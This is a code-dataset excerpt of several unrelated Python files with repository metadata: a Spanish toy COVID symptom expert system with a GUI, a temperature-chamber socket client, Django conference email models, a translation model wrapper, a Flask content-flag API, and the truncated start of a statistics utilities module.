@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="no"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_3(self):
self.declare(Fact(tipo="Nivel severo uno"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="no"))
def tipo_4(self):
self.declare(Fact(tipo="Nivel severo dos"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="si"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="si"))
def tipo_5(self):
self.declare(Fact(tipo="Nivel severo tres"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="no"),Fact(perdida_olfato="no"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="no"),Fact(dolor_pecho="no"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_6(self):
self.declare(Fact(tipo="No es covid"))
@Rule(Fact(action='encontrar_tipo'),Fact(tipo=MATCH.tipo),salience = -998)
def tipo(self, tipo):
tipo_final.delete("0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
id_tipo = tipo
tipo_details = get_details(id_tipo)
tratamientos = get_tratamiento(id_tipo)
tipo_final.insert("0", id_tipo)
descripcion_tipo.insert("1.0", tipo_details)
sugerencias.insert("1.0",tratamientos)
@Rule(Fact(action='encontrar_tipo'),
Fact(dolor_cabeza=MATCH.dolor_cabeza),
Fact(perdida_olfato=MATCH.perdida_olfato),
Fact(dolor_muscular=MATCH.dolor_muscular),
Fact(tos=MATCH.tos),
Fact(dolor_garganta=MATCH.dolor_garganta),
Fact(dolor_pecho=MATCH.dolor_pecho),
Fact(fiebre=MATCH.fiebre),
Fact(ronquera=MATCH.ronquera),
Fact(perdida_apetito=MATCH.perdida_apetito),
Fact(diarrea=MATCH.diarrea),
Fact(fatiga=MATCH.fatiga),
Fact(confusion=MATCH.confusion),
Fact(dificultad_respiratoria=MATCH.dificultad_respiratoria),NOT(Fact(tipo=MATCH.tipo)),salience = -999)
def not_matched(self,dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera,perdida_apetito ,diarrea ,fatiga ,confusion ,dificultad_respiratoria):
global reinicio
if reinicio == 0:
tipo_final.delete("0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
tipo_final.insert("0", "Sin coincidencia")
descripcion_tipo.insert("1.0", "No se encontró un tipo de covid que se relacione con los síntomas presentados")
sugerencias.insert("1.0", "Se sugiere consultar a un médico que le ayude a descubrir su tipo de enfermedad")
else:
reinicio = 0
def iniciar_sistema():
if __name__ == "__main__":
preprocess()
engine = Covid()
engine.reset()
engine.run()
def reiniciar():
global reinicio
reinicio = 1
in_sin0.delete("0", END)
in_sin1.delete("0", END)
in_sin2.delete("0", END)
in_sin3.delete("0", END)
in_sin4.delete("0", END)
in_sin5.delete("0", END)
in_sin6.delete("0", END)
in_sin7.delete("0", END)
in_sin8.delete("0", END)
in_sin9.delete("0", END)
in_sin10.delete("0", END)
in_sin11.delete("0", END)
in_sin12.delete("0", END)
tipo_final.delete("0", END)
descripcion_tipo.delete('1.0', END)
sugerencias.delete('1.0', END)
preprocess()
engine = Covid()
engine.reset()
engine.run()
def salir():
exit()
#------------------BOTONES---------------------------------------
generarTabla = Button(
miFrame,
text="RESULTADO",
command=iniciar_sistema,
bg="#7fd1ff",
font=("Eurostile", 10, font.BOLD),
padx=20,
pady=5
)
generarTabla.grid(row=13, column=1, padx=10, pady=15)
reiniciar = Button(
mi2Frame, text="REINICIAR",
command=reiniciar,
bg="#7fd1ff",
font=("Eurostile", 10, font.BOLD),
padx=20,
pady=5
)
reiniciar.grid(row=9, column=0, padx=10, pady=15)
salir = Button(
mi2Frame, text="SALIR",
command=salir,
bg="#ea9999",
font=("Eurostile", 9),
border='2p',
padx=20,
pady=3
)
salir.grid(row=10, column=0, padx=10, pady=15)
raiz.mainloop()
| 43.851459
| 335
| 0.687576
| 2,486
| 16,532
| 4.445696
| 0.095736
| 0.026059
| 0.031668
| 0.034745
| 0.68232
| 0.576909
| 0.525154
| 0.504705
| 0.402823
| 0.332338
| 0
| 0.04531
| 0.108214
| 16,532
| 377
| 336
| 43.851459
| 0.704334
| 0.041979
| 0
| 0.15082
| 0
| 0
| 0.136025
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101639
| false
| 0
| 0.009836
| 0.006557
| 0.12459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a017aa5f81d90682eeec3d31e4bdb2e999666f4b
| 6,105
|
py
|
Python
|
socket_temperature_connect.py
|
MeowMeowZi/PPLTestTool
|
576f28fb20680b1ed33520d92c552ccafc93d716
|
[
"MIT"
] | null | null | null |
socket_temperature_connect.py
|
MeowMeowZi/PPLTestTool
|
576f28fb20680b1ed33520d92c552ccafc93d716
|
[
"MIT"
] | null | null | null |
socket_temperature_connect.py
|
MeowMeowZi/PPLTestTool
|
576f28fb20680b1ed33520d92c552ccafc93d716
|
[
"MIT"
] | null | null | null |
import socket
import time
import shelve
preset_command = {
1: ['MB0023,1', 'MI0695,'],
2: ['MB0024,1', 'MI0696,'],
3: ['MB0076,1', 'MI0697,'],
4: ['MB0026,1', 'MI0698,'],
}
force_command = 'MB0336,1'
start_command = 'MB0020,0'
stop_command = 'MB0020,1'
class Temperature:
def __init__(self):
# 是否打印log信息
self.is_info = False
# 打印log信息
self.info = ''
# temp测试任务
self.task = []
# 打开配置文件
self.init_temp = shelve.open('init/init_temp')
self.ip = self.init_temp['temp_ip']
self.channel1_temp = self.init_temp['temp_channel1_temp']
self.channel2_temp = self.init_temp['temp_channel2_temp']
self.channel3_temp = self.init_temp['temp_channel3_temp']
self.channel4_temp = self.init_temp['temp_channel4_temp']
self.is_channel1_temp = self.init_temp['temp_is_channel1_temp']
self.is_channel2_temp = self.init_temp['temp_is_channel2_temp']
self.is_channel3_temp = self.init_temp['temp_is_channel3_temp']
self.is_channel4_temp = self.init_temp['temp_is_channel4_temp']
# 关闭配置文件
self.init_temp.close()
self.channel1 = (self.channel1_temp, 1)
self.channel2 = (self.channel2_temp, 2)
self.channel3 = (self.channel3_temp, 3)
self.channel4 = (self.channel4_temp, 4)
# 创造套接字
self.server = socket.socket()
# self.ip = '192.168.0.14'
self.port = 5000
try:
self.server.connect((self.ip, self.port))
# print('[INFO-TEMP]connect successfully')
self.send_info('[INFO-TEMP]connect successfully')
time.sleep(1)
except:
# print('[FAIL-TEMP]connect fail')
self.send_info('[FAIL-TEMP]connect fail')
# 向设备发送数据
def send(self, data):
try:
self.server.send(bytes(data, encoding='ASCII'))
except ConnectionError:
# print('[FAIL-TEMP]send data fail')
self.send_info('[FAIL-TEMP]send data fail')
# 向设备接受数据
def recv(self):
try:
text = str(self.server.recv(1024), encoding='UTF-8')
# print(text)
except ConnectionError:
# print('[FAIL-TEMP]receive error')
self.send_info('[FAIL-TEMP]receive error')
text = ',9990'
return text
# 指令 (发送指令)
def command(self, command):
self.send('m')
time.sleep(1)
self.send(command)
time.sleep(1)
# 写入指令 (无返回值)
def write_command(self, command):
self.command(command)
self.ack()
# 询问指令 (有返回值)
def query_command(self, command):
self.command(command)
return self.recv()
# 设备应答
def ack(self):
while True:
if self.recv() == 'OK':
break
# 温度预设 (四个通道)
def preset(self, channel):
temp = int(channel[0])
temp_command = ''
if temp == 0:
temp_command = '0000'
elif (temp > 0) and (temp < 10):
temp_command = '00' + str(temp) + '0'
elif (temp > 9) and (temp < 100):
temp_command = '0' + str(temp) + '0'
elif temp > 99:
temp_command = str(temp) + '0'
elif (temp < 0) and (temp > -10):
temp_command = '0' + str(temp) + '0'
elif temp < -9:
temp_command = '' + str(temp) + '0'
elif temp >= 175:
temp_command = '1750'
elif temp <= -75:
temp_command = '-750'
channel_command = preset_command[channel[1]][1]
command = channel_command + temp_command
self.write_command(command)
# print('[INFO-TEMP]channel%s, %s℃ set successfully!' % (channel[1], channel[0]))
self.send_info('[INFO-TEMP]channel' + str(channel[1]) + ', ' + str(channel[0]) +'℃ set successfully!')
# 选择温度预设为当前值
def change_channel(self, channel):
state_command = preset_command[channel[1]][0]
self.write_command(state_command)
# print('[INFO-TEMP]change channel:', channel[1])
self.send_info('[INFO-TEMP]change channel ' + str(channel[1]) + " " + str(channel[0]) + '℃')
# 将测试项添加到任务列表中
def task_generate(self):
if self.is_channel1_temp:
self.preset((self.channel1_temp, 1))
self.task.append(self.channel1)
if self.is_channel2_temp:
self.preset((self.channel2_temp, 2))
self.task.append(self.channel2)
if self.is_channel3_temp:
self.preset((self.channel3_temp, 3))
self.task.append(self.channel3)
if self.is_channel4_temp:
self.preset((self.channel4_temp, 4))
self.task.append(self.channel4)
self.write_command(force_command)
# print('[INFO-TEMP]force on')
self.send_info('[INFO-TEMP]force on')
# 检查设备温度 (1秒询问一次)
def check_temp(self, channel):
while True:
for i in range(3):
text = self.query_command('MI0006?') # 获取格式为 MI6,250
temp1 = int(text.split(',')[1]) # 250 整数位+小数位
# print('[INFO-TEMP]temp: ', temp1 / 10.0, '℃')
self.send_info('[INFO-TEMP]temp: ' + str(temp1 / 10.0) + '℃')
temp = int(channel[0])
if (temp1 == temp * 10) and (i == 2):
return
elif temp1 == temp * 10:
pass
else:
break
# 启动设备
def start(self):
self.write_command(start_command)
# print('[INFO-TEMP]running!')
self.send_info('[INFO-TEMP]running!')
# 关闭设备
def stop(self):
self.write_command(stop_command)
# print('[INFO-TEMP]close!')
self.send_info('[INFO-TEMP]close!')
# 用于切换不同task
def run(self, task):
self.change_channel(task)
self.check_temp(task)
time.sleep(1)
# 向主线程发送数据
def send_info(self, info):
self.info = info
self.is_info = True
if __name__ == '__main__':
temperature = Temperature()
| 30.678392
| 110
| 0.552826
| 740
| 6,105
| 4.409459
| 0.197297
| 0.051486
| 0.040454
| 0.044131
| 0.350291
| 0.178057
| 0.064664
| 0.050567
| 0.019001
| 0
| 0
| 0.049157
| 0.310238
| 6,105
| 198
| 111
| 30.833333
| 0.723344
| 0.106143
| 0
| 0.138686
| 0
| 0
| 0.103156
| 0.015501
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109489
| false
| 0.007299
| 0.021898
| 0
| 0.160584
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a0187e302825ea7cb1c14461fb74435494c1cd4b
| 12,938
|
py
|
Python
|
wwwdccn/chair_mail/models.py
|
marvinxu99/dccnsys
|
8f53728d06b859cace42cc84bc190bc89950d252
|
[
"MIT"
] | 16
|
2020-03-15T15:33:30.000Z
|
2021-11-26T21:57:27.000Z
|
wwwdccn/chair_mail/models.py
|
marvinxu99/dccnsys
|
8f53728d06b859cace42cc84bc190bc89950d252
|
[
"MIT"
] | 11
|
2019-04-27T19:15:43.000Z
|
2022-03-11T23:43:08.000Z
|
wwwdccn/chair_mail/models.py
|
marvinxu99/dccnsys
|
8f53728d06b859cace42cc84bc190bc89950d252
|
[
"MIT"
] | 10
|
2020-03-14T09:25:39.000Z
|
2022-02-21T16:46:33.000Z
|
from django.conf import settings
from django.core.mail import send_mail
from django.db import models
from django.db.models import ForeignKey, OneToOneField, TextField, CharField, \
SET_NULL, CASCADE, BooleanField, UniqueConstraint
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template import Template, Context
from django.utils import timezone
from markdown import markdown
from html2text import html2text
from chair_mail.context import get_conference_context, get_user_context, \
get_submission_context, get_frame_context
from conferences.models import Conference
from submissions.models import Submission
from users.models import User
MSG_TYPE_USER = 'user'
MSG_TYPE_SUBMISSION = 'submission'
MESSAGE_TYPE_CHOICES = (
(MSG_TYPE_USER, 'Message to users'),
(MSG_TYPE_SUBMISSION, 'Message to submissions'),
)
class EmailFrame(models.Model):
text_html = models.TextField()
text_plain = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now_add=True)
created_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
conference = models.ForeignKey(Conference, on_delete=models.CASCADE)
@staticmethod
def render(frame_template, conference, subject, body):
context_data = get_frame_context(conference, subject, body)
context = Context(context_data, autoescape=False)
return Template(frame_template).render(context)
def render_html(self, subject, body):
return EmailFrame.render(
self.text_html, self.conference, subject, body
)
def render_plain(self, subject, body):
text_plain = self.text_plain
if not text_plain:
text_plain = html2text(self.text_html)
return EmailFrame.render(
text_plain, self.conference, subject, body
)
class EmailSettings(models.Model):
frame = models.ForeignKey(EmailFrame, on_delete=models.SET_NULL, null=True)
conference = models.OneToOneField(
Conference, null=True, blank=True, on_delete=models.CASCADE,
related_name='email_settings',
)
class GroupMessage(models.Model):
subject = models.CharField(max_length=1024)
body = models.TextField()
conference = models.ForeignKey(
Conference,
on_delete=models.CASCADE,
related_name='sent_group_emails',
)
sent_at = models.DateTimeField(auto_now_add=True)
sent_by = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True,
related_name='sent_group_emails'
)
sent = models.BooleanField(default=False)
@property
def message_type(self):
return ''
class UserMessage(GroupMessage):
recipients = models.ManyToManyField(User, related_name='group_emails')
group_message = models.OneToOneField(
GroupMessage, on_delete=models.CASCADE, parent_link=True)
@property
def message_type(self):
return MSG_TYPE_USER
@staticmethod
def create(subject, body, conference, objects_to):
msg = UserMessage.objects.create(
subject=subject, body=body, conference=conference)
for user in objects_to:
msg.recipients.add(user)
msg.save()
return msg
def send(self, sender):
# 1) Update status and save sender chair user:
self.sent = False
self.sent_by = sender
self.save()
# 2) For each user, we render this template with the given context,
# and then build the whole message by inserting this body into
# the frame. Plain-text version is also formed from HTML.
frame = self.conference.email_settings.frame
conference_context = get_conference_context(self.conference)
for user in self.recipients.all():
context = Context({
**conference_context,
**get_user_context(user, self.conference)
}, autoescape=False)
email = EmailMessage.create(
group_message=self.group_message,
user_to=user,
context=context,
frame=frame
)
email.send(sender)
# 3) Update self status, write sending timestamp
self.sent_at = timezone.now()
self.sent = True
self.save()
return self
class SubmissionMessage(GroupMessage):
recipients = models.ManyToManyField(
Submission, related_name='group_emails')
group_message = models.OneToOneField(
GroupMessage, on_delete=models.CASCADE, parent_link=True)
@property
def message_type(self):
return MSG_TYPE_SUBMISSION
@staticmethod
def create(subject, body, conference, objects_to):
msg = SubmissionMessage.objects.create(
subject=subject, body=body, conference=conference)
for submission in objects_to:
msg.recipients.add(submission)
msg.save()
return msg
def send(self, sender):
# 1) Update status and save sender chair user:
self.sent = False
self.sent_by = sender
self.save()
# 2) For each user, we render this template with the given context,
# and then build the whole message by inserting this body into
# the frame. Plain-text version is also formed from HTML.
frame = self.conference.email_settings.frame
conference_context = get_conference_context(self.conference)
for submission in self.recipients.all():
submission_context = get_submission_context(submission)
for author in submission.authors.all():
user = author.user
context = Context({
**conference_context,
**submission_context,
**get_user_context(user, self.conference)
}, autoescape=False)
email = EmailMessage.create(
group_message=self.group_message,
user_to=user,
context=context,
frame=frame
)
email.send(sender)
# 3) Update self status, write sending timestamp
self.sent_at = timezone.now()
self.sent = True
self.save()
return self
def get_group_message_model(msg_type):
return {
MSG_TYPE_USER: UserMessage,
MSG_TYPE_SUBMISSION: SubmissionMessage,
}[msg_type]
def get_message_leaf_model(msg):
"""If provided a `GroupMessage` instance, check the inheritance, find
the most descent child and return it. Now the possible leaf models are
`UserMessage` and `SubmissionMessage`."""
if hasattr(msg, 'usermessage'):
return msg.usermessage
elif hasattr(msg, 'submissionmessage'):
return msg.submissionmessage
# Also check, maybe a message is already a leaf:
if isinstance(msg, UserMessage) or isinstance(msg, SubmissionMessage):
return msg
# If neither succeeded, raise an error:
raise TypeError(f'Not a group message: type(msg)')
class EmailMessage(models.Model):
subject = models.TextField(max_length=1024)
text_plain = models.TextField()
text_html = models.TextField()
user_to = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='emails'
)
sent_at = models.DateTimeField(auto_now_add=True)
sent = models.BooleanField(default=False)
sent_by = models.ForeignKey(
User,
on_delete=models.SET_NULL, null=True,
related_name='sent_emails'
)
group_message = models.ForeignKey(
GroupMessage,
on_delete=models.SET_NULL,
null=True,
related_name='messages',
)
@staticmethod
def create(group_message, user_to, context, frame):
template_body = Template(group_message.body)
template_subject = Template(group_message.subject)
body_md = template_body.render(context)
body_html = markdown(body_md)
subject = template_subject.render(context)
return EmailMessage.objects.create(
user_to=user_to,
group_message=group_message,
subject=subject,
text_html=frame.render_html(subject, body_html),
text_plain=frame.render_plain(subject, body_md),
)
def send(self, sender):
if not self.sent:
from_email = settings.DEFAULT_FROM_EMAIL
send_mail(self.subject, self.text_plain, from_email, [self.user_to],
html_message=self.text_html)
self.sent_at = timezone.now()
self.sent_by = sender
self.sent = True
self.save()
return self
class SystemNotification(models.Model):
"""This model represents a system notification fired on a specific event.
The model itself doesn't define the circumstances in which the message
must be sent, which are subject to views.
Notification is defined with a mandatory name, optional description,
subject and template. If template is not assigned or subject is not
specified, messages won't be sent.
Notification can also be turned off with `is_active` flag field.
"""
ASSIGN_STATUS_SUBMIT = 'assign_status_submit'
ASSIGN_STATUS_REVIEW = 'assign_status_review'
ASSIGN_STATUS_ACCEPT = 'assign_status_accept'
ASSIGN_STATUS_REJECT = 'assign_status_reject'
ASSIGN_STATUS_INPRINT = 'assign_status_inprint'
ASSIGN_STATUS_PUBLISHED = 'assign_status_publish'
NAME_CHOICES = (
(ASSIGN_STATUS_REVIEW, 'Assign status REVIEW to the paper'),
(ASSIGN_STATUS_SUBMIT, 'Assign status SUBMIT to the paper'),
(ASSIGN_STATUS_ACCEPT, 'Assign status ACCEPT to the paper'),
(ASSIGN_STATUS_REJECT, 'Assign status REJECT to the paper'),
(ASSIGN_STATUS_INPRINT, 'Assign status IN-PRINT to the paper'),
(ASSIGN_STATUS_PUBLISHED, 'Assign status PUBLISHED to the paper'),
)
name = CharField(max_length=64, choices=NAME_CHOICES)
subject = CharField(max_length=1024, blank=True)
is_active = BooleanField(default=False)
type = CharField(max_length=64, choices=MESSAGE_TYPE_CHOICES, blank=False)
body = TextField(blank=True)
conference = ForeignKey(Conference, related_name='notifications',
on_delete=CASCADE)
class Meta:
constraints = [
UniqueConstraint(fields=['conference', 'name'], name='unique_name'),
]
def send(self, recipients, sender=None):
if self.is_active and self.body and self.subject:
message_class = get_group_message_model(self.type)
message = message_class.create(
self.subject, self.body, self.conference, recipients)
message.send(sender)
DEFAULT_NOTIFICATIONS_DATA = {
SystemNotification.ASSIGN_STATUS_REVIEW: {
'subject': 'Submission #{{ paper_id }} is under review',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is assigned for the review.
Reviews are expected to be ready at **{{ rev_end_date|time:"H:i:s" }}**.'''
},
SystemNotification.ASSIGN_STATUS_SUBMIT: {
'subject': 'Submission #{{ paper_id }} is in draft editing state',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is in draft editing
state.
At this point you can modify review manuscript, title and other data if you
need.'''
},
SystemNotification.ASSIGN_STATUS_ACCEPT: {
'subject': 'Submission #{{ paper_id }} was accepted',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
congratulations, your submission #{{ paper_id }} **"{{ paper_title }}"** was
accepted for the conference.'''
},
SystemNotification.ASSIGN_STATUS_REJECT: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
unfortunately your submission #{{ paper_id }} **"{{ paper_title }}"**
was rejected according to the double-blinded review.
'''
},
SystemNotification.ASSIGN_STATUS_INPRINT: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** camera-ready was
sent to the publisher. We will let you know when the paper will be published.
'''
},
SystemNotification.ASSIGN_STATUS_PUBLISHED: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
we are glad to inform you that your submission #{{ paper_id }}
**"{{ paper_title }}"** was published.
'''
},
}
| 35.157609
| 83
| 0.659762
| 1,489
| 12,938
| 5.545332
| 0.162525
| 0.043599
| 0.024706
| 0.01526
| 0.45743
| 0.401114
| 0.341407
| 0.312583
| 0.29587
| 0.25651
| 0
| 0.002569
| 0.247952
| 12,938
| 367
| 84
| 35.253406
| 0.846043
| 0.09646
| 0
| 0.358885
| 0
| 0
| 0.159488
| 0.00576
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052265
| false
| 0
| 0.04878
| 0.017422
| 0.320557
| 0.003484
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a01dc69fc961ecf3abcdcc4efc76fa8f20eeb48a
| 1,753
|
py
|
Python
|
translator/model.py
|
marco-nicola/python-translator
|
6a559874c9899e52a4cac9c2954dcca6b638f002
|
[
"Apache-2.0"
] | null | null | null |
translator/model.py
|
marco-nicola/python-translator
|
6a559874c9899e52a4cac9c2954dcca6b638f002
|
[
"Apache-2.0"
] | null | null | null |
translator/model.py
|
marco-nicola/python-translator
|
6a559874c9899e52a4cac9c2954dcca6b638f002
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Marco Nicola
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, MarianMTModel, \
MarianTokenizer
from .config import ConfigLanguageModel
class Model:
def __init__(self, conf: ConfigLanguageModel, models_path: str):
self._conf: ConfigLanguageModel = conf
self._models_path: str = models_path
self._tokenizer: Optional[MarianTokenizer] = None
self._model: Optional[MarianMTModel] = None
def load(self) -> None:
logging.info(f'[{self._conf.model}] - Loading tokenizer...')
self._tokenizer = AutoTokenizer.from_pretrained(
self._conf.model, cache_dir=self._models_path)
logging.info(f'[{self._conf.model}] - Loading model...')
self._model = AutoModelForSeq2SeqLM.from_pretrained(
self._conf.model, cache_dir=self._models_path)
logging.info(f'[{self._conf.model}] - Loaded.')
def translate(self, text: str) -> str:
tokenized = self._tokenizer(text, return_tensors="pt", padding=True)
outputs = self._model.generate(**tokenized)
return self._tokenizer.decode(outputs[0], skip_special_tokens=True)
| 38.108696
| 79
| 0.718768
| 220
| 1,753
| 5.581818
| 0.490909
| 0.045603
| 0.052932
| 0.039088
| 0.15228
| 0.15228
| 0.15228
| 0.120521
| 0.120521
| 0.120521
| 0
| 0.007714
| 0.186537
| 1,753
| 45
| 80
| 38.955556
| 0.853436
| 0.312607
| 0
| 0.086957
| 0
| 0
| 0.095718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.173913
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a021e7c81cd72a8cb8466d95bea774bd4667239f
| 1,692
|
py
|
Python
|
src/api/content_flag.py
|
Viewly/alpha-2
|
6b6d827197489164d8c4bde4f4d591dcec5a2163
|
[
"MIT"
] | null | null | null |
src/api/content_flag.py
|
Viewly/alpha-2
|
6b6d827197489164d8c4bde4f4d591dcec5a2163
|
[
"MIT"
] | 1
|
2021-05-07T06:26:16.000Z
|
2021-05-07T06:26:16.000Z
|
src/api/content_flag.py
|
Viewly/alpha-2
|
6b6d827197489164d8c4bde4f4d591dcec5a2163
|
[
"MIT"
] | null | null | null |
import datetime as dt
import json
from flask_restful import (
Resource,
reqparse,
)
from flask_security import current_user
from marshmallow_sqlalchemy import ModelSchema
from .utils import auth_required
from .. import db
from ..core.utils import log_exception
from ..models import ContentFlag
class FlagSchema(ModelSchema):
class Meta:
model = ContentFlag
include_fk = True
flag_schema = FlagSchema()
parser = reqparse.RequestParser()
parser.add_argument('video_id', type=str, required=True)
parser.add_argument('flag_type', type=str)
class FlagApi(Resource):
method_decorators = [auth_required]
def get(self):
args = parser.parse_args()
flag = \
(db.session.query(ContentFlag)
.filter(ContentFlag.video_id == args['video_id'],
ContentFlag.user_id == current_user.id)
.first())
return flag_schema.dump(flag).data or ({}, 404)
def put(self):
args = parser.parse_args()
try:
assert args['flag_type'] in \
['xxx', 'hate', 'scam', 'spam', 'plagiarism'], 'Invalid flag'
flag = ContentFlag(
user_id=current_user.id,
video_id=args['video_id'],
flag_type=args['flag_type'],
created_at=dt.datetime.utcnow(),
)
db.session.add(flag)
db.session.commit()
except AssertionError as e:
log_exception()
return dict(message=str(e)), 400
except Exception as e:
log_exception()
return dict(message=str(e)), 500
return flag_schema.dump(flag).data
| 26.030769
| 77
| 0.60461
| 193
| 1,692
| 5.134715
| 0.414508
| 0.035318
| 0.034309
| 0.038345
| 0.272452
| 0.189707
| 0.072654
| 0.072654
| 0.072654
| 0
| 0
| 0.007513
| 0.291962
| 1,692
| 64
| 78
| 26.4375
| 0.8197
| 0
| 0
| 0.08
| 0
| 0
| 0.052009
| 0
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.04
| false
| 0
| 0.18
| 0
| 0.38
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a0220e4b4dae9e864bc6a43965e05ecf1eb56be9
| 13,231
|
py
|
Python
|
cgmodsel/utils.py
|
franknu/cgmodsel
|
b008ed88e4f10205ee0ff5e9433d5426c1d5ff6a
|
[
"MIT"
] | 1
|
2020-09-01T08:39:14.000Z
|
2020-09-01T08:39:14.000Z
|
cgmodsel/utils.py
|
franknu/cgmodsel
|
b008ed88e4f10205ee0ff5e9433d5426c1d5ff6a
|
[
"MIT"
] | null | null | null |
cgmodsel/utils.py
|
franknu/cgmodsel
|
b008ed88e4f10205ee0ff5e9433d5426c1d5ff6a
|
[
"MIT"
] | 1
|
2020-09-04T13:35:41.000Z
|
2020-09-04T13:35:41.000Z
|
# -*- coding: utf-8 -*-
"""
Copyright: Frank Nussbaum (frank.nussbaum@uni-jena.de)
This file contains various functions used in the module including
- sparse norms and shrinkage operators
- a stable logsumexp implementation
- array printing-method that allows pasting the output into Python code
"""
import numpy as np
#################################################################################
# norms and shrinkage operators
#################################################################################
try:
# the following requires setup
# import os
# os.system('python cyshrink/setup.py build_ext --inplace')
# TODO(franknu): configure n_threads/interface
from cyshrink.shrink.shrink import grp as grp_soft_shrink
from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight
print('successfully imported shrink.shrink')
except Exception as e:
print(e)
# from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight2
# naive and slow implementations
print('''
Failed to import Cython shrink functions, setup is required...
using slower native Python functions instead''')
def grp_soft_shrink(mat, tau, glims, off=False):
"""just a wrapper for grp_soft_shrink_weight with weiths=None"""
return grp_soft_shrink_weight(mat, tau, glims, off=False, weights=None)
def grp_soft_shrink_weight(mat, tau,
glims,
off=False,
weights=None):
"""
calculate (group-)soft-shrinkage.
Args:
mat (np.array): matrix.
tau (float): non-negative shrinkage parameter.
off (bool): if True, do not shrink diagonal entries.
glims: group delimiters (cumulative sizes of groups).
weights (optional): weights for weighted l_{1,2} norm/shrinkage.
Returns:
tuple: shrunken matrix, (group) l_{1,2}-norm of shrunken matrix.
Note:
this code could be made much faster
